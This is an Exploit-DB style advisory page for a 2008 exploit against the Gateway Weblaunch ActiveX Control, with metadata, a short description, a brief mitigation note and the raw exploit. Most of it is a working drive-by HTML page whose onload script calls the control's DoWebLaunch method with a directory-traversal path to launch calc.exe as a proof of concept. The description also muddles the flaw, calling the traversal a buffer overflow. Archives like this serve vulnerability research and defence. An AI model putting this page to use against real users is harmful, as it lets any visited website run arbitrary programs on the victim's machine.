Gateway Weblaunch ActiveX Control Insecure Method Exploit

vendor:

Gateway Weblaunch ActiveX Control

by:

e.b.

7.5

CVSS

HIGH

Insecure Method Exploit

CWE

Product Name: Gateway Weblaunch ActiveX Control

Affected Version From: 1.0.0.1

Affected Version To: 1.0.0.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP2

2008

Gateway Weblaunch ActiveX Control Insecure Method Exploit

This exploit targets the Gateway Weblaunch ActiveX Control and utilizes an insecure method to launch arbitrary executable files. The exploit uses a buffer overflow vulnerability in the 2nd and 4th parameters of the DoWebLaunch method. By passing specially crafted parameters, an attacker can escape the intended directory and execute arbitrary commands on the target system. In this example, the exploit launches the Windows Calculator (calc.exe) as a proof of concept.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Gateway Weblaunch ActiveX Control to a patched version that addresses the insecure method. Additionally, users should exercise caution when interacting with untrusted websites or ActiveX controls.

Source

Exploit-DB raw data:

<!-- 
Gateway Weblaunch ActiveX Control Insecure Method Exploit
Implemented Categories:
Category: Safe for Initialising
Category: Safe for Scripting
Written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, weblaunch.ocx version 1.0.0.1
This method is also vulnerable to a buffer overflow in the 2nd and 4th parameters
-->
<html>
 <head>
  <title>Gateway Weblaunch ActiveX Control Insecure Method Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     
                //escape from systemdrive\documents and settings\username\local settings\temp
		obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\calc.exe","","");
          
    } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:93CEA8A4-6059-4E0B-ADDD-73848153DD5E" height="0" width="0">
     Unable to create object
    </object>
 </body>
</html>

# milw0rm.com [2008-01-08]